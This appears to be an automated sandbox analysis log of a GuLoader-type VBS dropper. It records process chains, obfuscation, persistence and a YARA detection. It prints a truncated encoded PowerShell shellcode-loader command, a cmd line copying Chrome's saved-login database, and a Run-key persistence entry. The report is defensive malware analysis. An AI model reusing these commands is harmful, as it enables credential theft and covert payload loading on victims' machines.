      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdlineJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220113Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\FORSVARL.datJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@25/17@2/2
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
      Source: C:\Windows\SysWOW64\cmstp.exeFile written: C:\Users\user\AppData\Roaming\O118090C\O11logri.iniJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

      Data Obfuscation:

      barindex
      VBScript performs obfuscated calls to suspicious functionsShow sources
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBSAHYAZQBuACAAUABBA", "", "", "0")
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0761CC11 push es; iretd 4_2_0761CC12
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0761CC88 push es; iretd 4_2_0761CC8A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0761CC8B push es; iretd 4_2_0761CC92
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07616930 push es; ret 4_2_07616940
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED5D0D1 push ecx; ret 18_2_1ED5D0E4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0482D0D1 push ecx; ret 27_2_0482D0E4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_006479E4 pushfd ; retf 27_2_006479E5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00647316 push ds; retf 27_2_00647318
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D4C5 push eax; ret 27_2_0064D518
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D57C push eax; ret 27_2_0064D582
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064E517 push ss; ret 27_2_0064E518
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D512 push eax; ret 27_2_0064D518
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D51B push eax; ret 27_2_0064D582
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064DE6D push dword ptr [ACFE0177h]; ret 27_2_0064DF57
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdlineJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dllJump to dropped file
      Source: C:\Windows\SysWOW64\cmstp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVVJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVVJump to behavior
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
